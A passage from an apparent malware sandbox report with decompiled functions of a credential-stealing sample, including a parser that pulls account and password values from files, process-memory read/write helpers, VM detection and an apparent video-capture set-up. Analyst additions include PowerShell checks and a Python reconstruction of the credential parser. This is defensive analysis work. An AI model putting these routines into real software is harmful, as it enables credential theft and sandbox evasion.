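    param()

    $svcKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService'
    $paramKey = Join-Path -Path $svcKey -ChildPath 'Parameters'

    # Missing values come back as $null rather than terminating the check.
    $imagePath  = (Get-ItemProperty -Path $svcKey   -Name ImagePath  -ErrorAction SilentlyContinue).ImagePath
    $serviceDll = (Get-ItemProperty -Path $paramKey -Name ServiceDll -ErrorAction SilentlyContinue).ServiceDll

    # ServiceDll is REG_EXPAND_SZ; expand it so the path comparison is literal.
    $expandedDll = [Environment]::ExpandEnvironmentVariables([string]$serviceDll)
    $expectedDll = Join-Path -Path $env:SystemRoot -ChildPath 'System32\termsrv.dll'

    $findings = New-Object 'System.Collections.Generic.List[string]'

    if (-not $imagePath) {
        $findings.Add('TermService ImagePath is missing')
    } elseif ($imagePath -notmatch '(?i)svchost\.exe') {
        # The sample only proceeds when the service is svchost-hosted; a non-svchost
        # ImagePath is itself unusual for TermService and worth a look.
        $findings.Add("ImagePath is not svchost-hosted: $imagePath")
    }

    if (-not $serviceDll) {
        $findings.Add('TermService Parameters\ServiceDll is missing')
    } elseif (-not [string]::Equals($expandedDll, $expectedDll, [StringComparison]::OrdinalIgnoreCase)) {
        $findings.Add("ServiceDll does not point at the default termsrv.dll: $expandedDll")
    }

    # Whatever the path says, the DLL that is actually loaded must carry a valid
    # Microsoft signature; a replaced or patched termsrv.dll fails this.
    if ($expandedDll -and (Test-Path -LiteralPath $expandedDll)) {
        $sig = Get-AuthenticodeSignature -FilePath $expandedDll
        if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            $findings.Add("ServiceDll signature check failed ($($sig.Status)): $expandedDll")
        }
    }

    [pscustomobject]@{
        ImagePath  = $imagePath
        ServiceDll = $expandedDll
        Suspicious = ($findings.Count -gt 0)
        Findings   = $findings.ToArray()
    }
}

# Usage: run elevated on the host under investigation.
Test-TermServiceRegistration | Format-List
```

The signature check is the part that matters most: the registry path can look correct while the file itself has been replaced, and the decompiled code's use of PathFileExistsW and CreateFileW around the Parameters key is consistent with writing a file to that location. Treat a Suspicious result as a lead to pull the DLL for analysis, not as a verdict on its own.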

                                  APIs
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                  • CoInitialize.OLE32(00000000), ref: 00410D4B
                                  • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • VariantInit.OLEAUT32(?), ref: 00410DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize$CreateInitInstanceSecurityVariant
                                  • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                  • API String ID: 2382742315-1265846757
                                  • Opcode ID: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                  • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                  • Opcode Fuzzy Hash: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                  • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%
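The API and string list above (CoInitializeSecurity, CoCreateInstance against root\CIMV2, the WQL query SELECT Name FROM Win32_VideoController) is a WMI lookup of the display adapter name, which loaders commonly use to recognise a virtual machine. The following PowerShell is an added example for analysts preparing a sandbox; it is not the sample's code. It issues the same query through CIM and flags names that match a list of hypervisor adapter markers. That marker list is an assumption on my part, not something the report states the sample checks, and it should be tuned to the environment.

```powershell
# Added example, not code from the sample: issue the same WQL query the sample
# sends to root\CIMV2 and report which adapter names would betray a VM.
function Get-VideoControllerVmIndicators {
    [CmdletBinding()]
    param(
        # Assumed hypervisor adapter markers; not taken from the report.
        [string[]]$HypervisorMarkers = @('VMware', 'VirtualBox', 'VBox', 'Hyper-V',
                                          'QXL', 'Red Hat', 'Parallels', 'Xen', 'Bochs')
    )

    $adapters = Get-CimInstance -Namespace 'root\CIMV2' `
                                -Query 'SELECT Name FROM Win32_VideoController'

    foreach ($adapter in $adapters) {
        $name = [string]$adapter.Name
        # First marker that appears in the adapter name, or $null if none does.
        $hit = $HypervisorMarkers |
               Where-Object { $name -match [regex]::Escape($_) } |
               Select-Object -First 1

        [pscustomobject]@{
            Adapter      = $name
            VmMarker     = $hit
            LooksVirtual = [bool]$hit
        }
    }
}

# Usage: run inside the analysis VM before detonation; any LooksVirtual = True
# row is a name the guest exposes to malware that performs this check.
Get-VideoControllerVmIndicators | Format-Table -AutoSize
```

If the analysis VM returns a flagged adapter name, the sandbox is likely to be recognised by this and similar checks, and the sample may take a different path than it would on a real victim.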

                                  C-Code - Quality: 100%
                                  			E0040EE24(long* __ecx, void** __edx, long _a4) {
                                  				long _v8;
                                  				intOrPtr _v12;
                                  				LONG* _v16;
                                  				void* _t30;
                                  				void _t32;
                                  				void* _t35;
                                  				int _t37;
                                  				void* _t44;
                                  				void* _t46;
                                  				void* _t52;
                                  				long _t62;
                                  				void* _t63;
                                  				struct _OVERLAPPED* _t74;
                                  
                                  				_t60 = __ecx;
                                  				_v12 = 0x426970;
                                  				_t74 = 0;
                                  				_v16 = 0;
                                  				_t62 = __ecx[1];
                                  				_t72 = __edx;
                                  				_t30 =  *_t62;
                                  				if(_t30 == 0) {
                                  					_t63 = __edx[1];
                                  					_t32 =  *_t63;
                                  					if(_t32 == 0) {
                                  						E0040102C( *__ecx,  *__edx, _a4);
                                  						_t74 = 1;
                                  						L22:
                                  						return _t74;
                                  					}
                                  					_t35 = _t32 - 1;
                                  					if(_t35 == 0) {
                                  						_t37 = ReadProcessMemory( *( *(_t63 + 4)),  *__edx,  *__ecx, _a4, 0);
                                  						L8:
                                  						_t74 = _t37;
                                  						goto L22;
                                  					}
                                  					if(_t35 != 5 || SetFilePointer( *( *(_t63 + 4)),  *__edx, 0, 0) == 0xffffffff) {
                                  						goto L22;
                                  					} else {
                                  						_t37 = ReadFile( *( *(_t72[1] + 4)),  *_t60, _a4,  &_v8, 0);
                                  						goto L8;
                                  					}
                                  				}
                                  				_t44 = _t30 - 1;
                                  				if(_t44 == 0) {
                                  					if( *(__edx[1]) != 0) {
                                  						L11:
                                  						_t46 = LocalAlloc(0x40, _a4);
                                  						_v16 = _t46;
                                  						if(_t46 != 0) {
                                  							if(E0040EE24( &_v16, _t72, _a4) != 0) {
                                  								_t74 = E0040EE24(_t60,  &_v16, _a4);
                                  							}
                                  							LocalFree(_v16);
                                  						}
                                  						goto L22;
                                  					}
                                  					_t37 = WriteProcessMemory( *( *(_t62 + 4)),  *__ecx,  *__edx, _a4, 0);
                                  					goto L8;
                                  				}
                                  				_t52 = _t44;
                                  				if(_t52 == 0) {
                                  					goto L11;
                                  				}
                                  				if(_t52 != 3) {
                                  					goto L22;
                                  				}
                                  				if( *(__edx[1]) != 0) {
                                  					goto L11;
                                  				}
                                  				if( *__ecx == 0 || SetFilePointer( *( *(_t62 + 4)),  *__ecx, 0, 0) != 0) {
                                  					_t37 = WriteFile( *( *(_t60[1] + 4)),  *_t72, _a4,  &_v8, _t74);
                                  					goto L8;
                                  				} else {
                                  					goto L22;
                                  				}
                                  			}

                                  Instruction addresses (the listing's side column, one entry per statement in source order; 0x00000000 where the decompiler assigned no address):
                                  0x0040ee2b, 0x0040ee2d, 0x0040ee35, 0x0040ee37, 0x0040ee3a, 0x0040ee3e, 0x0040ee42, 0x0040ee44
                                  0x0040eefe, 0x0040ef03, 0x0040ef05, 0x0040ef61, 0x0040ef6b, 0x0040ef6c, 0x0040ef72, 0x0040ef72
                                  0x0040ef07, 0x0040ef0a, 0x0040ef4f, 0x0040ee98, 0x0040ee98, 0x00000000, 0x0040ee98, 0x0040ef0f
                                  0x00000000, 0x0040ef25, 0x0040ef37, 0x00000000, 0x0040ef37, 0x0040ef0f, 0x0040ee4a, 0x0040ee4d
                                  0x0040eea4, 0x0040eebb, 0x0040eec0, 0x0040eec6, 0x0040eecb, 0x0040eee1, 0x0040eef1, 0x0040eef1
                                  0x0040eef6, 0x0040eef6, 0x00000000, 0x0040eecb, 0x0040eeb3, 0x00000000, 0x0040eeb3, 0x0040ee50
                                  0x0040ee53, 0x00000000, 0x00000000, 0x0040ee58, 0x00000000, 0x00000000, 0x0040ee63, 0x00000000
                                  0x00000000, 0x0040ee67, 0x0040ee92, 0x00000000, 0x00000000, 0x00000000, 0x00000000

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                  • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                  • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                  • LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                  • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                  • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                  • String ID: `@
                                  • API String ID: 3276737649-951712118
                                  • Opcode ID: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction ID: e72bb7fa78d81cf8525c6baf04ae928c9dbf0452580219fbc960ee642851fe31
                                  • Opcode Fuzzy Hash: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction Fuzzy Hash: B5415B35100016FFCB128FAACD8489ABFB5FF0A35071485A2F509EA2B0D736D920DF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00409244(intOrPtr __ecx, CHAR* _a4) {
                                  				char _v12;
                                  				long _v16;
                                  				void* _v20;
                                  				long _v24;
                                  				intOrPtr _v28;
                                  				void* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _t96;
                                  				void* _t102;
                                  				char _t104;
                                  				void* _t125;
                                  				intOrPtr _t127;
                                  				char _t128;
                                  				long _t133;
                                  				void* _t135;
                                  				intOrPtr _t136;
                                  				void* _t141;
                                  				void* _t146;
                                  				void* _t147;
                                  				intOrPtr* _t165;
                                  				intOrPtr* _t167;
                                  				void* _t168;
                                  				void* _t169;
                                  				void* _t170;
                                  				void* _t172;
                                  				intOrPtr* _t173;
                                  				void* _t174;
                                  				intOrPtr _t175;
                                  				intOrPtr* _t177;
                                  				CHAR* _t178;
                                  				void* _t179;
                                  				void* _t180;
                                  
                                  				_v36 = __ecx;
                                  				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                  				if(_t174 != 0xffffffff) {
                                  					_t133 = GetFileSize(_t174, 0);
                                  					_v16 = _t133;
                                  					_t172 = E00401085(_t133);
                                  					_v32 = _t172;
                                  					E00401052(_t172, 0, _t133);
                                  					_v24 = _v24 & 0x00000000;
                                  					_t180 = _t179 + 0x10;
                                  					ReadFile(_t174, _t172, _t133,  &_v24, 0);
                                  					CloseHandle(_t174);
                                  					_t175 = E00405FFA(0x400000);
                                  					_v28 = _t175;
                                  					_a4 = E00405FFA(0x104);
                                  					_t96 = E00405FFA(0x104);
                                  					_t141 = 0;
                                  					_v12 = _t96;
                                  					_t135 = 0;
                                  					__eflags = _v16;
                                  					if(_v16 <= 0) {
                                  						L36:
                                  						E00405FEB(_a4);
                                  						E00405FEB(_v12);
                                  						E00405FEB(_t175);
                                  						return E00401099(_t172);
                                  					} else {
                                  						goto L3;
                                  					}
                                  					do {
                                  						L3:
                                  						_t167 =  *((intOrPtr*)(_t135 + _t172));
                                  						_t13 = _t167 - 0x21; // -33
                                  						__eflags = _t13 - 0x5d;
                                  						if(_t13 > 0x5d) {
                                  							goto L28;
                                  						}
                                  						__eflags = _t167 - 0x3d;
                                  						if(_t167 == 0x3d) {
                                  							goto L28;
                                  						}
                                  						 *((char*)(_t141 + _t175)) = _t167;
                                  						_t141 = _t141 + 1;
                                  						__eflags = _t167;
                                  						if(_t167 != 0) {
                                  							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
                                  							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
                                  							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
                                  							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
                                  							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
                                  							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
                                  							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
                                  							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
                                  								goto L28;
                                  							}
                                  							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
                                  							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
                                  								__eflags =  *_t172 - 0xd0;
                                  								_t102 = 2;
                                  								_t146 = 9;
                                  								_t103 =  !=  ? _t146 : _t102;
                                  								_t168 = 0;
                                  								_t147 = ( !=  ? _t146 : _t102) + _t135;
                                  								_t104 =  *((intOrPtr*)(_t147 + _t172));
                                  								__eflags = _t104 - 0x20;
                                  								if(_t104 <= 0x20) {
                                  									L35:
                                  									_t60 =  &_v12; // 0x50
                                  									__eflags = 0;
                                  									_v52 = 0;
                                  									_v48 = 0;
                                  									_v44 = 0;
                                  									 *((char*)(_t168 +  *_t60)) = 0;
                                  									E004034D1( &_v20,  *_t60);
                                  									_t66 =  &_a4; // 0x50
                                  									E004034D1( &_v16,  *_t66);
                                  									E00403549( &_v44, E004031AF( &_v20, __eflags,  &_v32));
                                  									E00405FEB(_v32);
                                  									E00403549( &_v48, E004031AF( &_v16, __eflags,  &_v32));
                                  									E00405FEB(_v32);
                                  									_v40 = 5;
                                  									E00403549( &_v52, E004036F7( &_v32, 0x417668));
                                  									E00405FEB(_v32);
                                  									E00401FF2(_t180 - 0x10,  &_v52);
                                  									E00402028(_v36);
                                  									E00405FEB(_v16);
                                  									E00405FEB(_v20);
                                  									E00401441( &_v52);
                                  									goto L36;
                                  								}
                                  								_t58 =  &_v12; // 0x50
                                  								_t136 =  *_t58;
                                  								_t165 = _t147 + _t172;
                                  								__eflags = _t165;
                                  								while(1) {
                                  									__eflags = _t104 - 0x7f;
                                  									if(_t104 >= 0x7f) {
                                  										goto L35;
                                  									}
                                  									__eflags = _t104 - 0x21;
                                  									if(_t104 == 0x21) {
                                  										goto L35;
                                  									}
                                  									 *((char*)(_t168 + _t136)) = _t104;
                                  									_t168 = _t168 + 1;
                                  									_t165 = _t165 + 1;
                                  									_t104 =  *_t165;
                                  									__eflags = _t104 - 0x20;
                                  									if(_t104 > 0x20) {
                                  										continue;
                                  									}
                                  									goto L35;
                                  								}
                                  								goto L35;
                                  							}
                                  							goto L28;
                                  						}
                                  						__eflags = _t141 - 7;
                                  						if(_t141 <= 7) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
                                  						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
                                  						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
                                  						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
                                  						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
                                  						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
                                  						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
                                  						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
                                  							goto L28;
                                  						}
                                  						__eflags =  *_t172 - 0xd0;
                                  						_t125 = 2;
                                  						_t169 = 9;
                                  						_t126 =  !=  ? _t169 : _t125;
                                  						_t170 = 0;
                                  						_t127 = ( !=  ? _t169 : _t125) + _t135;
                                  						_v20 = _t127;
                                  						_t128 =  *((intOrPtr*)(_t127 + _t172));
                                  						__eflags = _t128 - 0x20;
                                  						if(_t128 <= 0x20) {
                                  							L19:
                                  							 *((char*)(_t170 + _a4)) = 0;
                                  							goto L28;
                                  						}
                                  						_t177 = _v20 + _t172;
                                  						__eflags = _t177;
                                  						_v20 = _t177;
                                  						_t173 = _t177;
                                  						_t178 = _a4;
                                  						while(1) {
                                  							__eflags = _t128 - 0x7f;
                                  							if(_t128 >= 0x7f) {
                                  								break;
                                  							}
                                  							_t173 = _t173 + 1;
                                  							 *((char*)(_t170 + _t178)) = _t128;
                                  							_t170 = _t170 + 1;
                                  							_t128 =  *_t173;
                                  							__eflags = _t128 - 0x20;
                                  							if(_t128 > 0x20) {
                                  								continue;
                                  							}
                                  							break;
                                  						}
                                  						_t175 = _v28;
                                  						_t172 = _v32;
                                  						goto L19;
                                  						L28:
                                  						_t135 = _t135 + 1;
                                  						__eflags = _t135 - _v16;
                                  					} while (_t135 < _v16);
                                  					goto L36;
                                  				}
                                  				GetLastError();
                                  				return CloseHandle(_t174);
                                  			}
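The routine above is the sample's account/password file parser: it reads the whole file into memory, keeps only bytes in 0x21..0x7E other than '=', and whenever the filtered stream ends in "Account" or "Password" copies the printable run that starts a fixed distance after the keyword (2 bytes if the file begins with 0xD0, otherwise 9) into one of two 0x104-byte buffers; on the first "Password" hit it records the pair through E00402028 and returns. The Python below is an added analyst reconstruction of that control flow for offline study, not code from the sample or from the report. It assumes E00402028 merely stores one record, tests both keywords where the decompiler's condition "if(_t167 != 0)" is ambiguous, adds an end-of-buffer guard the original lacks, and runs on constructed input because the report does not name the file format being parsed.

```python
"""Analyst's re-implementation of the account/password parser decompiled as
E00409244 above. This is an added reconstruction of the decompiled control
flow for offline study, not code from the sample or from the report.

Labelled assumptions:
  * E00402028(this) is modelled as "store one (account, password) record";
    the decompiled function returns right after that call, so one file
    yields at most one record.
  * The decompiler's branch "if(_t167 != 0)" between the Password and the
    Account suffix tests is unclear; both suffixes are tested here. They
    cannot match at the same time, so the outcome is the same either way.
  * The report does not name the file format; SAMPLE_PLAIN and SAMPLE_OLE
    below are constructed inputs that exercise both skip distances.
"""
from typing import Optional, Tuple


def _skip_distance(data: bytes) -> int:
    # Decompiled: first byte of the file == 0xD0 selects 2, anything else 9.
    # The value is read that many bytes after the keyword's last character.
    return 2 if data[:1] == b"\xd0" else 9


def _copy_value(data: bytes, start: int, stop_on_bang: bool) -> str:
    """Copy the run of bytes in 0x21..0x7E starting at data[start].

    Mirrors the two inner loops: a byte <= 0x20 or >= 0x7F ends the run, and
    the Password loop (stop_on_bang=True) additionally ends at '!' (0x21).
    The original copies into a 0x104-byte heap buffer without a length check
    and without checking the end of the file buffer; the end-of-data check
    here is added for safety and the buffer limit is not modelled.
    """
    out = []
    pos = start
    while pos < len(data):
        c = data[pos]
        if c <= 0x20 or c >= 0x7F:
            break
        if stop_on_bang and c == 0x21:
            break
        out.append(chr(c))
        pos += 1
    return "".join(out)


def parse_credential_file(data: bytes) -> Tuple[str, Optional[str]]:
    """Walk the file the way E00409244 does.

    Returns (account, password); password is None when no "Password"
    keyword was found. account is "" until an Account keyword is seen
    (assumption: the 0x104-byte buffer from E00405FFA starts zeroed).
    """
    skip = _skip_distance(data)
    accum = []      # the 4 MiB scratch buffer _t175: filtered printable bytes
    account = ""    # the _a4 buffer: value of the last Account keyword
    for i, c in enumerate(data):
        # Outer filter: (c - 0x21) > 0x5D unsigned rejects c outside
        # 0x21..0x7E; '=' (0x3D) is rejected separately.
        if c < 0x21 or c > 0x7E or c == 0x3D:
            continue
        accum.append(chr(c))
        n = len(accum)
        # Password test: accum[n-8..n-1] == "Password". The original has no
        # n >= 8 guard and would read before the buffer; one is added here.
        if n >= 8 and "".join(accum[-8:]) == "Password":
            password = _copy_value(data, i + skip, stop_on_bang=True)
            return account, password          # E00402028 + cleanup + return
        # Account test: requires n > 7 and accum[n-7..n-1] == "Account",
        # so a keyword at the very start of the file is never matched.
        if n > 7 and "".join(accum[-7:]) == "Account":
            account = _copy_value(data, i + skip, stop_on_bang=False)
    return account, None


# Constructed inputs (not captured data). In SAMPLE_PLAIN the first byte is
# not 0xD0, so skip == 9: eight filler bytes separate keyword and value.
SAMPLE_PLAIN = (
    b"[Acct1]\r\nAccount" + b"\x00" * 8 + b"alice@example.test\r\n"
    + b"Password" + b"\x00" * 8 + b"hunter2!ignored\r\n"
)
# SAMPLE_OLE starts with 0xD0, so skip == 2: one filler byte in between.
SAMPLE_OLE = (
    b"\xd0\xcf\x11\xe0" + b"mail\x00Account" + b"\x00" + b"bob\x00"
    + b"Password" + b"\x00" + b"p w"
)

if __name__ == "__main__":
    print(parse_credential_file(SAMPLE_PLAIN))   # ('alice@example.test', 'hunter2')
    print(parse_credential_file(SAMPLE_OLE))     # ('bob', 'p')
```

Run it directly to see both constructed inputs parsed. The '!' in SAMPLE_PLAIN's password shows that the Password loop, unlike the Account loop, stops at 0x21, and the two extra cases in the checks below show the n > 7 quirk (a keyword at offset 0 is ignored) and the no-password case.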

                                  Instruction addresses (the listing's side column, one entry per statement in source order; 0x00000000 where the decompiler assigned no address):
                                  0x0040924f, 0x00409267, 0x0040926c, 0x00409288, 0x0040928b, 0x00409294, 0x00409299, 0x0040929c
                                  0x004092a1, 0x004092a8, 0x004092b1, 0x004092b8, 0x004092c8, 0x004092d1, 0x004092db, 0x004092de
                                  0x004092e3, 0x004092e5, 0x004092ea, 0x004092ec, 0x004092ef, 0x004094da, 0x004094dd, 0x004094e5
                                  0x004094ec, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x004092f5, 0x004092f5, 0x004092f5
                                  0x004092f8, 0x004092fb, 0x004092fd, 0x00000000, 0x00000000, 0x00409303, 0x00409306, 0x00000000
                                  0x00000000, 0x0040930c, 0x0040930f, 0x00409310, 0x00409312, 0x004093b1, 0x004093b6, 0x00000000
                                  0x00000000, 0x004093b8, 0x004093bd, 0x00000000, 0x00000000, 0x004093bf, 0x004093c4, 0x00000000
                                  0x00000000, 0x004093c6, 0x004093cb, 0x00000000, 0x00000000, 0x004093cd, 0x004093d2, 0x00000000
                                  0x00000000, 0x004093d4, 0x004093d9, 0x00000000, 0x00000000, 0x004093db, 0x004093e0, 0x00000000
                                  0x00000000, 0x004093e2, 0x004093e7, 0x004093f8, 0x004093fd, 0x00409400, 0x00409401, 0x00409404
                                  0x00409406, 0x00409409, 0x0040940c, 0x0040940e, 0x00409428, 0x00409428, 0x0040942b, 0x0040942d
                                  0x00409430, 0x00409433, 0x00409436, 0x0040943d, 0x00409442, 0x00409448, 0x0040945d, 0x00409465
                                  0x0040947a, 0x00409482, 0x0040948f, 0x0040949f, 0x004094a7, 0x004094b5, 0x004094bd, 0x004094c5
                                  0x004094cd, 0x004094d5, 0x00000000, 0x004094d5, 0x00409410, 0x00409410, 0x00409413, 0x00409413
                                  0x00409415, 0x00409415, 0x00409417, 0x00000000, 0x00000000, 0x00409419, 0x0040941b, 0x00000000
                                  0x00000000, 0x0040941d, 0x00409420, 0x00409421, 0x00409422, 0x00409424, 0x00409426, 0x00000000
                                  0x00000000, 0x00000000, 0x00409426, 0x00000000, 0x00409415, 0x00000000, 0x004093e7, 0x00409318
                                  0x0040931b, 0x00000000, 0x00000000, 0x00409321, 0x00409326, 0x00000000, 0x00000000, 0x0040932c
                                  0x00409331, 0x00000000, 0x00000000, 0x00409337, 0x0040933c, 0x00000000, 0x00000000, 0x00409342
                                  0x00409347, 0x00000000, 0x00000000, 0x0040934d, 0x00409352, 0x00000000, 0x00000000, 0x00409358
                                  0x0040935d, 0x00000000, 0x00000000, 0x00409363, 0x00409368, 0x00000000, 0x00000000, 0x0040936a
                                  0x0040936f, 0x00409372, 0x00409373, 0x00409376, 0x00409378, 0x0040937a, 0x0040937d, 0x00409380
                                  0x00409382, 0x004093a6, 0x004093a9, 0x00000000, 0x004093ad, 0x00409387, 0x00409387, 0x00409389
                                  0x0040938c, 0x0040938e, 0x00409391, 0x00409391, 0x00409393, 0x00000000, 0x00000000, 0x00409395
                                  0x00409396, 0x00409399, 0x0040939a, 0x0040939c, 0x0040939e, 0x00000000, 0x00000000, 0x00000000
                                  0x0040939e, 0x004093a0, 0x004093a3, 0x00000000, 0x004093e9, 0x004093e9, 0x004093ea, 0x004093ea
                                  0x00000000, 0x004093f3, 0x0040926e, 0x00000000

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                  • GetLastError.KERNEL32 ref: 0040926E
                                  • CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                  • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateErrorLastReadSize
                                  • String ID: Password$Password
                                  • API String ID: 1366138817-7788977
                                  • Opcode ID: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                  • Instruction ID: 0d079fec5c7f131bda1ced3cf5849022ba7cb4fed2040c8ba0bcc6ec81886411
                                  • Opcode Fuzzy Hash: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                  • Instruction Fuzzy Hash: 3F81F270C08246AEEB259B65C891BEE7B74AF09318F54817FE441BA2C3C77D5D828B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			/* COM-driven capture set-up. What the report shows for this function: CoInitialize,
                                  			   three CoCreateInstance calls (CLSIDs at 0x4175c0, 0x417600 via E00414A12 and
                                  			   0x417610; none of them is resolved in the report), two objects registered on the
                                  			   0x417610 object under the names "Source" and "Grabber", and the string "vids" in
                                  			   this function's string list. Reading this as a DirectShow filter graph with a
                                  			   sample grabber on a video source is an analyst assumption, not a statement of the
                                  			   report. Vtable slots 0/4/8 are IUnknown::QueryInterface/AddRef/Release. */
                                  			E004146E1(intOrPtr __ecx, intOrPtr _a4) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v58;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				void* _v128;
                                  				char _v144;
                                  				intOrPtr _v148;
                                  				char _v216;
                                  				intOrPtr* _t63;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t80;
                                  				intOrPtr* _t82;
                                  				intOrPtr* _t89;
                                  				intOrPtr* _t91;
                                  				intOrPtr* _t92;
                                  				intOrPtr* _t93;
                                  				intOrPtr* _t94;
                                  				intOrPtr* _t95;
                                  				intOrPtr* _t96;
                                  				intOrPtr* _t98;
                                  				signed int _t103;
                                  				intOrPtr* _t115;
                                  				intOrPtr* _t118;
                                  				void* _t121;
                                  				/* _t2, _t7, _t22, _t31, _t56, _t105 and _t113 are temporaries the decompiler uses below without declaring them. */
                                  
                                  				_v28 = __ecx;
                                  				__imp__CoInitialize(0);
                                  				_t2 =  &_v24; // 0x414222
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_t118 = 0;
                                  				_v20 = 0;
                                  				_t89 = 0;
                                  				_v24 = 0;
                                  				_t115 = __imp__CoCreateInstance;
                                  				_t63 =  *_t115(0x4175c0, 0, 1, 0x41a79c, _t2);   /* CLSCTX_INPROC_SERVER; interface pointer lands in _v24 */
                                  				_t7 =  &_v24; // 0x414222
                                  				_t91 =  *_t7;
                                  				if(_t91 == 0) {
                                  					L8:   /* common exit: Release() every interface that was obtained, then CoUninitialize */
                                  					_t92 = _v12;
                                  					if(_t92 != 0) {
                                  						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                  						_v12 = _v12 & 0x00000000;
                                  					}
                                  					L10:
                                  					_t93 = _v16;
                                  					if(_t93 != 0) {
